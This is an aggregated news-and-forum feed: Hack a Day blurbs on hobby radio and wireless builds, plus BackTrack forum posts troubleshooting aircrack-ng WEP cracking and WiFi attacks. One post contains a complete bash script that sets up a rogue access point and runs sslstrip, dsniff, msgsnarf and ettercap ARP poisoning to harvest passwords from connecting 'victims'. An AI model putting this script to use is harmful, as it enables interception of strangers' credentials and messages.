-
-
6:40
»
Hack a Day
The back story behind [Mike] experimenting with plants as AM radio transmission antennae is rather interesting and worth the short read. But for those who just want the facts, [Mike] took an ATMega324, modified the PWM output into a sinusoidal AM signal (using a simple form of RLC circuitry), and connected the circuit to [...]
-
-
13:00
»
Hack a Day
[Rafael] built a system that uses radio frequency for communications. The code he was using with the inexpensive receiver/transmitter pairs already had some error correction but from time to time an entire message would be missed by the receiver. He set out to make these RF communications more robust. A little more than a year [...]
-
-
6:30
»
Hack a Day
A small, cheap spectrum analyzer with an LCD can be a fun thing to play with. But to be truly useful you need access to raw data, and lots of it. [Travis Goodspeed] set out to make that possible by pulling data with a GoodFET and a Python script. He started with [Michael Ossmann's] IM-ME [...]
-
-
13:00
»
Hack a Day
[Ben Kurtz] is doing a little WEP cracking but in a bit of a different way than we’re used to. WEP cracking makes us think of war driving; driving around with your laptop open, looking for WiFi access points, and stopping to run some software when you find them. [Ben's] way is similar but different [...]
-
-
11:00
»
Hack a Day
For all those times you need to broadcast your own access point where there’s no outlet [Larry] shows us how to make a solar-powered hotspot. He started by slapping a solar panel on the lid of a cigar box and attaching it to five rechargeable AA batteries inside. These power the mainboard from a router which is [...]
-
-
10:00
»
Hack a Day
[Thomas Pfeifer] has taken the PPM signal produced by model aircraft wireless controllers, and with an ATMega8, converted the signal to act as a USB joystick. Which means you can now use a standard R/C remote control to fly model aircrafts on your computer. Of course now with PPM decoded you could also use the [...]
-
-
12:00
»
Hack a Day
This module is a sensor package for monitoring the electrical activity of the heart. It is the product of an effort to create a Wireless Body Sensor Network node that is dependable while consuming very little electricity, which means a longer battery life. To accomplish this, the microcontroller in charge of the node compresses the data [...]
-
-
14:00
»
Hack a Day
Feeling bad that his access point was being made fun of by models with beefier external antennas, [Customer Service] decided to do something about it. After cracking open the Asus wl-330ge he found it would be quite easy to add a connector. This access point has two internal antennas that are quite small and use [...]
-
-
13:00
»
Hack a Day
[gpsKlaus] built this little FM radio (translated) based on the AR1010 IC. That chip is controlled via I2C by an ATtiny45 microcontroller. His tuning implementation relies on presetting 16 stations in the firmware and selecting them with the white potentiometer. The FM chip came on a breakout board from SparkFun. Not bad at around $15 [...]
-
-
11:00
»
Hack a Day
That’s a camera perched atop this aircraft’s wing. [Trappy] built the video system into his Ritewing Zephyr and his test flights in the Austrian Alps make for some breathtaking video. The foam wing is pretty easy to work with and the tool of choice here is a hot knife to cut out cavities for the [...]
-
-
12:16
»
Hack a Day
Here’s a great tutorial on building your own quadrotor helicopter. This build isn’t necessarily less expensive than others we’ve seen since quality motors, propellers, and control circuitry aren’t cheap. But the design and assembly is well documented and presents a well-planned building procedure. The carbon-fiber tubes that make up the frame have extensions to protect [...]
-
-
13:00
»
Hack a Day
[Tommy Gober] built this Yagi-Uda antenna that has some handy design features. The boom is a piece of conduit with holes drilled in the appropriate places. The elements are aluminum arrow shafts; a good choice because they’re straight, relatively inexpensive, and they have #8-32 screw threads in one end. He used some threaded rod to [...]
-
-
5:40
»
Hack a Day
If you’re working on a device that includes RF wireless, [Colin's] Guide to PCB Trace Antenna Design might clear some headaches when sending off for PCBs. While it is directed at devices transmitting at 2.4GHz, the techniques and recommended equipment (read: espresso smith charts and network analyzers) should work for almost any frequency. While trace [...]
-
-
7:51
»
Hack a Day
[Michael Vincent] turned his TI-84 Plus into a spectrum analyzer. By running some assembly code on the device the link port can be used as an I2C bus (something we’ll have to keep in mind). After being inspired by the cell phone spectrum analyzer he set out to build a module compatible with the calculator [...]
-
-
11:00
»
Hack a Day
Add a bit of interest to your radio equipment with one of these unorthodox CW keys. [OH6DC] has been hard at work posting almost sixty of these hacks. Above you can see an alarm clock whose snooze button acts as the key, and a nail clipper used as a key. There’s a banana, a [...]
-
-
10:00
»
Hack a Day
[Andrew] used a DSL router to make his own Terminal Node Controller. This will become part of an APRS-IS network, an Internet-based network built by amateur radio operators. The router used here is a Dlink DSL-502T with an AVR based TNC module attached to the serial port header. The phone line connector and its accompanying [...]
-
-
12:18
»
Hack a Day
Here’s a homebrew remote control that [Jad Berro] is developing. He’s using a tank robot to test it out but eventually he plans to use it to control an RC plane thanks to the 434 MHz wireless module inside. There’s no shortage of input, with two analog sticks from a PlayStation controller, several momentary push buttons, [...]
-
-
7:00
»
Hack a Day
A student team at University of Massachusetts have built this wireless face tracking camera system. Using a small 2-axis motorized camera meant to be mounted on model airplanes, an arduino, and some custom software, they can track faces and keep them in frame in real-time. This is pretty cool, but maybe not quite as groundbreaking as they [...]
-
-
13:00
»
Hack a Day
While hacking a wireless presenter doesn’t sound like something worthwhile or interesting, [Niels Teusink] demonstrates that these little devices often are a lot more powerful than we give them credit. With an Arduino, plenty of research, and some heavy sniffing of a wireless presenter’s SPI and then wireless interface [Niels] is able to emulate an [...]
-
-
8:00
»
Hack a Day
[Zach Charat] didn’t want to carry around yet another card with him so he transplanted the RFID guts from his card to his phone. Soaking the card in nail polish remover for twelve hours got him nowhere, but when he broke out the acetone the card was falling apart in 30 seconds. Above you can [...]
-
-
7:36
»
Hack a Day
If your soldering skills are up to snuff you can add a motion control feature to your radio controlled transmitter. [Starlino] used a combination accelerometer and gyroscope module as an alternate source of analog control information. He built a filter to dial in the analog voltage range to match that of one of the sticks [...]
-
-
16:34
»
remote-exploit & backtrack
Hi, I have an Eee PC 1201N with this wireless card ---> RealTek RTL8192SE
Unfortunately it does not recognize the card; where can I find the drivers? Thanks
[OT]Second point, could you tell me how to get BackTrack to read a USB pen drive? On Ubuntu the device appears on the desktop, on BT it doesn't :confused:[/OT]
Thanks again
-
-
23:27
»
remote-exploit & backtrack
hi all
I have a TP-Link rt73 USB and D-Link DWA-110 and D-Link DWL-520+ and so many other adapters!
I tried to pentest my network with a D-Link 2640tl AP with WEP encryption (my pass is 1234567890)!! The problem is none of these adapters are able to authenticate with the AP (I installed the driver patches too)!! And the test option in aireplay-ng gives me 0%!! I read both rt73 and DWA-110 are capable of injecting and .. (even aircrack-ng's official web site advised to buy an rt73-based adapter!) Can anyone give me a tip!!
I used the following commands:
$myAPmaC and $MyADapterMac are exported before!
Code:
aireplay-ng -1 50 -a $myAPmaC -h $MyADapterMac wlan0
Thanks anyway and excuse my weak English!!
-
-
13:40
»
Hack a Day
[Jerome Demers] sent us his extremely detailed semester project. The two part system consists of PICs connected to XBee modules and accelerometers. By using the device a coach can monitor an athlete and correct their minute mistakes. Did we mention [Jerome] was very detailed? He also goes into the particulars of designing the circuit, using [...]
-
-
13:00
»
Hack a Day
[Andrew] certainly brings a bit of a James Bond feel to connecting to your WiMax base station. He built this antenna along with an auto-positioning system to get the strongest signal possible. The device, which appears a bit fragile, breaks down into a nice little case. When you get to your next checkpoint you can [...]
-
-
2:07
»
SecDocs
Authors: Mike Kershaw
Tags: wireless Metasploit WiFi
Event: Black Hat DC 2010
Abstract: We've figured out how to defend wireless access points, but clients remain exposed. A look at new attacks against clients using old methods we'd all forgotten about and new methods leveraging Metasploit. This talk will include pre-owning clients before vpn authentication, new ways of using gifars, crossdomain.xml attacks and more.
-
-
9:30
»
Hack a Day
[Paul Klemstine] is working on some PC-side software hacks for the IM-ME. We’ve seen a lot of hardware hacks for this device, such as controlling the display, firmware flashing, and using it as a spectrum analyzer, but if you don’t want to alter the device right away you can try [Paul's] collection of hacks. Working [...]
-
-
8:13
»
Hack a Day
[William Etter] and his classmates built a quadcopter as a class project. We love the details of these builds and they came through with some thorough documentation. Some highlights that we enjoyed were reading about ABS body design and construction, their analysis of two versus three blade propellers, and their breadboarded control mechanism. You can [...]
-
-
10:00
»
Hack a Day
We’ve noticed that wireless routers pump out a bunch of heat. [Jernej Kranjec] wanted to make sure that he didn’t fry it once he started adding more load to his router using OpenWRT. What he came up with is the idea of using an old CPU as a passive heat sink. He applied a bit [...]
-
-
12:21
»
remote-exploit & backtrack
I'm building a wireless bridge between two sites, I don't want to have to invest a bag of money for a dish so I am going to make my own.
I can't seem to find any suitable ones on the net so I thought I'd ask here.
Can anyone suggest where I could find mesh parabolic cooking utensils on the net? Needs to be mesh because it will be outside, true parabola shape and at least 10" in diameter.
Thanks. :)
-
-
6:00
»
Hack a Day
[.ronin] built an all-in-one WiFi and Bluetooth sniffer. He used a Nerf rifle as a base and added two Pringles cantennas, a tablet PC, and other various bits to tie it all together. Now he wanders the streets, explaining the device to bewildered passersby. After showing the device at CarolinaCon 2010 (here’s a PDF of [...]
-
-
7:01
»
Hack a Day
Alright class, quiet down and open your books to the chapter on Manchester Encoding. [Brian J Hoskins] did just that when building this RC5 decoder. This protocol is commonly used in television remote controls. You use them on a daily basis, don’t you think it’s time you understood what’s going on? Check out his writeup [...]
-
-
10:13
»
Hack a Day
If you’re interested in learning about Very Low Frequency communications take a look at what Larry has to offer on his site. He’s put together a guide to VLF receivers that is short enough to read and clear enough to understand with rudimentary knowledge of circuits. He builds a simple receiver as a working example [...]
-
-
0:27
»
remote-exploit & backtrack
I just recently downloaded the Church Of Wifi password list which is 40gb in size... however when I try to open any of the files in kate or a hex editor I don't get much apart from random ascii. I know people have successfully used the Church Of Wifi wpa tables or else the torrent wouldn't still be up, however trying to use the files in airolib-ng has not been successful.. If anyone could provide some advice on how to use these tables or with which program, that would be great
-
-
15:00
»
Hack a Day
If you’re into ham radio and want it when you’re on the go give this antenna mount a try. [Cirictech] started with a design from the November 2009 issue of QST and added his own fabrication touches. Everything except the antenna itself is available from the hardware store for just a few bucks, and you [...]
-
-
2:03
»
remote-exploit & backtrack
Hi guys.
I'll try to be thorough.
Following the recommendations of many posters here, I recently acquired an ALFA AWUS036H (rtl8187 driver) and am trying to break into my (own: I do not endorse illegal activity in any way) WEP-enabled router.
I am not in the habit of posting in forums for basic inquiries (as most information is on Google these days if one searches enough), but I find myself in need of assistance.
I am running BackTrack 4 final (released 11.01.2010) and issuing the following commands:
Code:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airodump-ng --channel <X> --bssid <XXXX...> -w <path> wlan0
aireplay-ng -1 0 -e <XXXX...> -a <XXXX...> -h <XXXX...> wlan0
Filling in the stuff in <>, naturally.
However I fail to get the association succeeded :-) message.
On the contrary, I get DeAuth'ed and I can't seem to understand why.
(In fact, it loops on:
Code:
Sending Authentication Request
Authentication successful
Sending Association Request
sometimes with [ACK], and sometimes with a "received a deauth packet!")
The aireplay-ng --test succeeds with 30/30 and I've tried the fake auth at various places around the house, with the same result. I've also disabled MAC filtering and tried variations of the aireplay-ng -1, such as the more detailed -1 attack on the aircrack wiki, and with -x 180 to limit packets, but to no avail.
The Association Succeeded :-) message has appeared briefly once however, after I macchanged my wlan0 to one of the connected PC's. The #/s rating jumped, and the ARP attack looked like it was working. I wasn't using keep-alive though and eventually got deauthed, and using the same mac address spoof associated no longer thereafter (rather, it gets deauth packets like mad).
I've read around and some other people have had similar problems, though I couldn't find a clear solution. If the answer to this has been posted elsewhere and I've missed it in my search, could someone please point me to it? Any help is appreciated.
-
-
10:34
»
remote-exploit & backtrack
If I am running fakeAP on one computer, would I be able to connect to it from another computer? and would that computer be on the same network?
-
-
17:53
»
remote-exploit & backtrack
I tried searching the forum but no luck it seems, maybe I don't know how to word it... anyhoo..
Anyone seen gerix freezing up when you do a rescan network... it will work sometimes for over an hour, all parts of the program. Sometimes not at all, even after more than 1 reboot. Any tips/help would be great.
-
6:50
»
remote-exploit & backtrack
First of all, I don't understand whether the IVs are the Beacons or the Data...
if they are the Beacons everything is fast, but I don't think so!
If they are the Data there is a real problem, because it finds more or less 1 every two minutes, and I don't think that is good.
Please tell me how I can speed up the capture of IVs.
P.S. I have an Atheros 9k
-
-
2:49
»
remote-exploit & backtrack
Hi friends
This is my setup for adhoc mode wlan
Quote:
NODE A
IP 192.168.1.3
NetMask 255.255.255.0
Ubuntu 9.10
mode adhoc
chipset Atheros9k
|
Quote:
NODE B
IP 192.168.1.2
NetMask 255.255.255.0
Sidux
mode adhoc
chipset BROADCOM4312
|
These two communicate very well
However if I change the scenario to
Node A having BT4 and Node B sidux .. then NODE A is not putting the card in adhoc mode.. I guess the issue with ath9k and ath_pci comes out
If I do this
NODE A sidux and NODE B sidux both go in adhoc mode but do not ping each other
and then I tried this also
NODE A Debian Etch and NODE B sidux both go in adhoc mode but do not ping each other
Please can someone tell me how to make the adhoc mode work.. as of now only Ubuntu Karmic seems to behave..
thanx
-
-
14:23
»
remote-exploit & backtrack
Hello ... very warmly
I'm new to this forum .. The first thing I would say is if you located the badly about it immediately apologize and please move if need be ...
But going to the heart of the matter.: Today I installed Back Track 4 on VB, I do everything I did and it works like a doll, so to speak. But one thing, namely MAIN - Not working: (. Is it WIFI, and here once I would like to emphasize that I have a USB WiFi antenna, the exact model of antennas - AirLive WL-1600USB
Please help, because they probably know from personal experience that BackTrack without an Internet connection is useless
P.S. VBoxGuestAdditions - has already been installed
Edit :
Slight correction: As for the Internet: I have internet signal, all you need to move the walls, but I still can not set the `interfaces in WIFI card ...,
Still waiting for answers...,
Thanks in advance, and Yours sincerely,
Szpaner
-
-
16:39
»
remote-exploit & backtrack
Hello,
I have an Intel WiFi Link 5100 AGN in my Sony laptop. It works in BT4 but in BT3 it doesn't show up for airmon-ng.
Anybody know why?
Thanks
-
15:00
»
remote-exploit & backtrack
Having installed BackTrack 4 Final to HD, when attempting to connect to a detected network, i receive a message "encryption has to be enabled before connecting to this network"? Can anyone please help? Thanks.
-
8:57
»
remote-exploit & backtrack
Hey guys
I was getting tired of typing all the commands in constantly so I made a little bash script for it. It is made for Ubuntu so a few changes will be needed, for example BT uses dhpcd instead of dhcpd3
Now the problem: a lot of the time the other computers don't see the wireless when applied to interface mon or so.
### edit ###
Found the problem only occurs with Windows XP
Now the only thing that doesn't work (yet?) is the dns service, the victim can't resolve the dns name but can access IP address directly
Anyone here who has more experience with the softAPs and is willing to help me???
Code:
#!/bin/bash
# SoftAP for wireless-testing
# Modded by Junke1990
#
# Hardware: Eee PC 1000h
# NICs
# eth0 (LAN)
# ra0 (WLAN) rt2860STA
# wlan1 (USB WLAN) RTL8170L # dealextreme sku.27963
# init
sslstrip='/home/junke/Bureaublad/sslstrip-0.7/sslstrip.py'
# services to listen on
dsn=1
ims=0
msg=1
# Make sure only root can run our script
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root" 1>&2
exit 1
fi
modprobe tun
sleep 1
echo "[>] Starting: Soft AP - Junke1990"
# get interface and mac list
i=0 iflist=() maclist=()
while read -r if mac; do
iflist[i]=$if
maclist[i]=$mac
((i++))
done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}')
for i in "${!iflist[@]}"; do
echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
done
echo -n "[?] Select your inet conn. [#] "
read j
intI=${iflist[j]}
# select SoftAP adapter
for i in "${!iflist[@]}"; do
if [ $j != $i ]; then
echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
fi
done
echo -n "[?] Select your SoftAP adapter. [#] "
read j
intAP=${iflist[j]}
# MAC address
intAP_MAC=${maclist[j]}
echo "[+] Gathering network info..."
# info inet conn
intI_IP=`ifconfig $intI | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`
intI_DNS=`cat /etc/resolv.conf | sed -n "2 p" | awk '{ print $2}'`
intI_gw=`route -n | awk '{ print $2}' | grep -v '0.0.0.0' | sed -n "3 p"`
intI_mask=`ifconfig $intI | grep 'Mask:' | grep -v '0.0.0.0' | awk '{ print $4}' | cut -d: -f2`
intI_netw=`route -n | grep $intI_mask | cut -d' ' -f1 | head -n 1`
# converting netmask in to netmask length
echo "[+] Calc'ing network mask..."
NETMASK=$intI_mask
MASK1=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\1/'`
MASK2=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\2/'`
MASK3=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\3/'`
MASK4=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
BM1=`echo -e "obase=2; ${MASK1}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM2=`echo -e "obase=2; ${MASK2}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM3=`echo -e "obase=2; ${MASK3}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
BM4=`echo -e "obase=2; ${MASK4}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
MASK=$(( BM1 + BM2 + BM3 + BM4))
intI_mask_nb=$MASK
# enter wireless essid name
echo -n "[?] Enter the desired name for wireless network: "; read ssid
# prepare interface / softap
#wlanconfig $intAP destroy
#wlanconfig $intAP create wlanmode mon wlandev wifi0
if [ `echo $intAP || grep 'mon' ` ]; then
intAP=`airmon-ng start $intAP |grep "monitor mode " | awk '{ print $5 }' |sed 's/)//'`;
fi
echo "[+] Setting up fake AP...";
sleep 1;
xterm -geometry 75x15 -e airbase-ng -W 1 -w "1234567890" -c 6 -e "$ssid" -a $intAP_MAC $intAP &
sleep 1;
ifconfig at0 up
ifconfig at0 192.168.3.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net $intI_netw netmask $intI_mask gw $intI_gw
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1
# monitor
#xterm -e airodump-ng -c 6 --bssid $intAP_MAC $intAP &
#xterm -e tshark -i 3 "not broadcast and not multicast" & # at0 = 3
echo "[+] Killing dhcpd and dnsmasq..."
# do this quiet for when the process isn't running
killall -q dhcpd3
killall -q dnsmasq
echo "[+] Setting up DHCP config..."
# create custom dhcpd.conf for WLAN
cat > dhcpd.conf << EOF
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.3.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.3.255;
option routers 192.168.3.1;
option domain-name-servers 192.168.3.1;
option domain-name-servers 208.67.222.222;
option domain-name-servers 208.67.220.220;
range 192.168.3.10 192.168.3.254;
}
EOF
echo "[+] Cleaning up IP tables..."
# iptables cleanup
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[+] Setting up forwarding tables..."
# iptables
iptables -t nat -A PREROUTING -p udp -j DNAT --to $intI_gw # all udp traffic
#iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $intI_DNS # DNS only
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 # send stuff to sslstrip
iptables -A FORWARD --in-interface at0 -j ACCEPT # rogue gateway
iptables -t nat -A POSTROUTING --out-interface $intI -j MASQUERADE # gateway to ext. router
#iptables -t nat -A PREROUTING -s 192.168.3.0/24 -d $intI_netw/$intI_mask_nb -j DROP # protect LAN from WLAN
# ip fwd enable
echo 1 > /proc/sys/net/ipv4/ip_forward
# start dhcp server for subnet
# edit /etc/apparmor.d/usr.sbin.dhcp3 to allow dhcpd to read the config file if it keeps giving permission denied
echo "[+] Setting up DHCP server..."
xterm -geometry 75x10 -T DHCP -e dhcpd3 -d -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &
# restart dnsmasq
echo "[+] Setting up dnsmasq..."
dnsmasq
### python-twisted-web2 required!!!
if [ -f $sslstrip ]; then
echo "[+] Setting up sslstrip..."
xterm -geometry 45x5 -e python $sslstrip -a -k -f -l 8080 &
xterm -e tail -f sslstrip.log &
xterm -e "tail -f sslstrip.log |grep 'pass' "&
sleep 1
else
echo "[-] SSLStrip not found..."
echo 'Edit $sslstrip to the correct path.'
fi
# DSniff
if [ $dsn == 1 ]; then
if which dsniff >/dev/null; then
echo "[+] Setting up dsniff..."
xterm -e dsniff -i at0 -m &
sleep 1
fi
else
echo "[-] DSniff not started..."
fi
# IMSniff - MSN only
if [ $ims == 1 ]; then
if which imsniff >/dev/null; then
if [ ! -d 'IMlog' ]; then
mkdir IMlog
fi
# gives a lot of unknown content err's
xterm -e "imsniff -cd IMlog at0 |grep -i -v 'unknown'"&
sleep 1
fi
else
echo "[-] IMSniff not started..."
fi
# MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo
if [ $msg == 1 ]; then
if which msgsnarf >/dev/null; then
echo "[+] Setting up msgsnarf..."
xterm -e msgsnarf -i at0 &
sleep 1
fi
else
echo "[-] MSGSnarf not started..."
fi
# ettercap TCP Ports
# IMAP - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS)
# POP3 - 110/TCP 995/TCP
# SMTP - 25/TCP 465/TCP
# SSL - 443/TCP
# HTTP - 80/TCP
# SSH - 22/TCP
# MSN - 1863/TCP
# Yahoo - 5050/TCP - nobody interesting uses yahoo...
# ICQ - 5190/TCP - nobody at all uses ICQ xD
sleep 1
echo "[+] Setting up ettercap..."
xterm -e ettercap -T -i at0 -P autoadd -l ettercap -w ettercap.pcap -M arp /192.168.3.1/ /192.168.3.10-254/22,25,80,110,143,220,443,465,993,995,1863 &
sleep 1
# ip_forward
# as last to avoid reset
echo "[+] Enabling IP forward..."
echo "1" > /proc/sys/net/ipv4/ip_forward
chk=`cat /proc/sys/net/ipv4/ip_forward`
if [ $chk != "1" ]; then
echo "Can't enable ip_forward"
fi
echo "[x] All done! have fun!"
-
-
15:05
»
remote-exploit & backtrack
Hi,
I have a general question about making a Soft AP/Fake AP. If a client A is connected with an AP B, and the connection between them is using WPA2 (preshared key), is it possible for me to act as AP B (with the MAC and SSID belonging to AP B) and downgrade the connection somehow?
With downgrade I mean making the connection use no encryption at all or using a weaker form of encryption.
Let's assume that I can use airdrop-ng to eliminate AP B.
?
/ Alex
-
14:13
»
remote-exploit & backtrack
I don't know too much about it, so I need a hint from some of the wireless guys..
My adapter, an Alfa 500 mW, is damaged.. its tx power is incredibly low now, kind of just 1 meter range connectivity..
I think it could be because I tried to use it once without an antenna :eek:
Yeah, now you could be wondering why.. just curiosity..
Could that be the reason it is damaged? What happens if I use my Alfa 500 mW without an antenna attached to it?
Another clue: I had used it with a 16 dBi omni-directional antenna.. and my adapter was getting hot. I am not sure what has damaged the adapter.
I want to know, because I will buy another one, and don't want to commit the same error again.
-
13:11
»
remote-exploit & backtrack
I tried to crack a WEP network with BackTrack4 and my VAIO Z laptop.
My wireless card was:
Code:
root@bt:~# airmon-ng
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
I changed it to monitor mode:
Code:
root@bt:~# airmon-ng start wlan0 6
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
(monitor mode enabled on mon0)
And then I test injection:
Code:
root@bt:~# aireplay-ng -9 mon0
20:59:17 Trying broadcast probe requests...
20:59:17 Injection is working!
20:59:19 Found 1 AP
20:59:19 Trying directed probe requests...
20:59:19 00:23:F8:84:31:1B - channel: 6 - 'Shatel'
20:59:21 Ping (min/avg/max): 1.436ms/3.492ms/7.525ms Power: -57.70
20:59:21 30/30: 100%
Then I started collecting IVs:
Code:
root@bt:~# airodump-ng -c 6 --bssid 00:23:F8:84:31:1B -w output mon0
CH 6 ][ BAT: 21 mins ][ Elapsed: 15 mins ][ 2010-03-11 20:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:23:F8:84:31:1B -21 100 8943 178 0 6 54 WEP WEP OPN Shatel
BSSID STATION PWR Rate Lost Packets Probes
00:23:F8:84:31:1B 00:24:D6:11:62:18 0 0 - 1 0 411384
And then I made a fake authentication:
Code:
root@bt:~# macchanger -s mon0
Current MAC: 00:24:d6:11:62:18 (unknown)
root@bt:~# aireplay-ng -1 6000 -o 1 -q 10 -e Shatel -a 00:23:F8:84:31:1B -h 00:24:D6:11:62:18 mon0
21:17:45 Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
21:17:45 Sending Authentication Request (Open System) [ACK]
21:17:45 Authentication successful
21:17:45 Sending Association Request [ACK]
21:17:45 Association successful :-) (AID: 1)
21:17:55 Sending keep-alive packet
And finally I started injection:
Code:
root@bt:~# aireplay-ng -3 -b 00:23:F8:84:31:1B -h 00:24:d6:11:62:18 mon0
20:36:51 Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
Saving ARP requests in replay_arp-0311-203651.cap
You should also start airodump-ng to capture replies.
Read 10150 packets (got 45 ARP requests and 2 ACKs), sent 424647 packets...(500 pps)
But injection didn't make any change in the speed of collecting packets(#/s).
I did this again:
Code:
root@bt:~# aireplay-ng -9 mon0
21:22:49 Trying broadcast probe requests...
21:22:51 No Answer...
21:22:51 Found 3 APs
21:22:51 Trying directed probe requests...
21:22:51 00:27:19:D8:B0:C2 - channel: 6 - 'TP-LINK_D8B0C2'
21:22:57 0/30: 0%
21:22:57 00:23:F8:84:31:1B - channel: 6 - 'Shatel'
21:23:03 0/30: 0%
21:23:03 00:80:48:3D:12:27 - channel: 6 - 'mecom.wifi.BG'
21:23:09 0/30: 0%
and it seems that injection is not working!
What should I do?! How can I collect IVs faster?! (Now, it takes days [or weeks!] to collect enough packets!)
Thanks!
-
-
15:09
»
remote-exploit & backtrack
I am looking at doing some WEP key cracking on my own system because I do small networking jobs and have a lot of people ask me about the WEP crack difficulty and security. I am mostly just looking to broaden my horizons a little. I have read it is really not that difficult and I have watched people do it via YouTube and I have scanned this forum and the other BackTrack forums. I have the steps down pretty good but I am unable to get it to work correctly and I do believe I know the problem but not sure...
When I run an aireplay -ng --test I get a "packet Injection is working" and it will give me a percent; I am usually getting around 50%. I am using an IBM T61 Lenovo (I can't remember but I think it is a 4965?), thinking maybe possibly a driver problem??
Should I be getting 100% on the test.. I usually install Netgear routers but I have installed a couple of Linksys's also..
Thanks for your help in advance. I hope that this is an informative and fun place to be.. My luck on the other BackTrack forum was not so fun..
nathan
-
15:05
»
remote-exploit & backtrack
so that my computer as for my mac address does not appear on the routers DHCP table or any other data logs.
Thanks in advance.
-
13:04
»
remote-exploit & backtrack
hi guys,
am tired to know how can compatible d-link to work with backtrack3
and where i could find the ethros to use it.
thank you for ur help
-
6:22
»
remote-exploit & backtrack
Hi everyone, the discussion I am opening is purely out of curiosity.
I would like to know whether anyone has ever managed to crack the WPA of Alice (24 characters) or that of Fastweb (10 characters). I gave up, at least as far as Alice's WPA is concerned, because I think it is impossible to guess it with a random dictionary or a brute force with crunch. Perhaps the best route is reverse engineering..... a rather difficult art to take up. There would only be one guy named saxdax who managed, according to others, to work back from the network's SSID to the standard WPA of the Alice router. As for the Fastweb one, the undertaking might be feasible with the help of pyrit.
What do you think?
-
5:51
»
remote-exploit & backtrack
Victim:
Model: HP 6310b
CPU: Intel(R) Core(TM) Duo CPU P8700 2.53GHz
Memory: 4GB
OS: Windows 7
Wireless Interface: Intel(R) WiFi Link 5100 AGN
WiFi security:WPA2/WPA-Enterprise with EAP-TLS(Smartcard or certificate) authentication, TKIP encryption
MAC address: 00:1E:65:F8:BA:A8
Attacker:
Model: Dell Optiplex GX270
CPU: Intel Pentium 4 2.60 GHz
Memory: 1GB
OS: BT4F
Wireless Card: Alfa AWUS360H with 7dB omnidirectional antenna
AP:
Model: Linksys WRT54GL v1.1
Firmware: v4.30.11, Aug. 17, 2007
Wireless security and settings: WPA2-Enterprise, AES+TKIP encryption, QoS/WMM, Key Renewal Interval=900s
BSSID: 00:18:39:D3:FB:A0
Radius server: FreeRADIUS-2.0.2, EAP-TLS authentication with X.509 certificates and DH key exchange
Run airodump-ng for WPA:
root@bt:~# airodump-ng -c 2 -w dump wlan2
CH 2 ][ Elapsed: 16 s ][ 2010-03-29 08:10 ][ WPA handshake: 00:18:39:D3:FB:A0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:D3:FB:A0 -44 100 158 202 3 2 54e. WPA TKIP MGT cuckoo
00:1F:33:FF:39:52 -77 0 154 0 0 2 54e. OPN NETGEAR
BSSID STATION PWR Rate Lost Packets Probes
00:18:39:D3:FB:A0 00:1E:65:F8:BA:A8 -30 54e-54e 1 143
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -36 0 - 1 101 125
^C
root@bt:~#
Run airodump-ng for WPA2:
root@bt:~# airodump-ng -c 2 -w dump wlan2
CH 2 ][ Elapsed: 3 mins ][ 2010-03-29 08:24 ][ WPA handshake: 00:18:39:D3:FB:A0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:D3:FB:A0 -40 100 1887 4249 0 2 54e. WPA2 CCMP MGT cuckoo
00:1F:33:FF:39:52 -72 0 1833 0 0 2 54e. OPN NETGEAR
00:1E:65:F8:BA:A8 -37 0 0 0 0 113 -1 <length: 0>
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:24:8C:57:8F:D3 -68 0 - 2 0 8
00:18:39:D3:FB:A0 00:1E:65:F8:BA:A8 -29 54e-54e 0 4287 cuckoo
00:1F:33:FF:39:52 00:18:39:D3:FB:A0 -36 1e- 1 0 8
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -37 0 - 1 159 1028
^C
Change attacker's MAC address:
root@bt:~# ifconfig wlan0 down
root@bt:~# macchanger --mac 00:1E:65:F8:BA:A8 wlan0
Current MAC: 00:c0:ca:1b:f8:b7 (Alfa, Inc.)
Faked MAC: 00:1e:65:f8:ba:a8 (unknown)
root@bt:~# ifconfig wlan0 up
(To be Continued)
-
4:00
»
remote-exploit & backtrack
hi!
I'm using BackTrack 4 on VMware. When I use the self-installed wlassistant I can see the wifi networks in my neighbourhood, but if I use airodump in the kernel, then I can NOT see any useful network details, I see nothing.
Please help me, what may be the problem. Thanks guys.
-
-
13:31
»
remote-exploit & backtrack
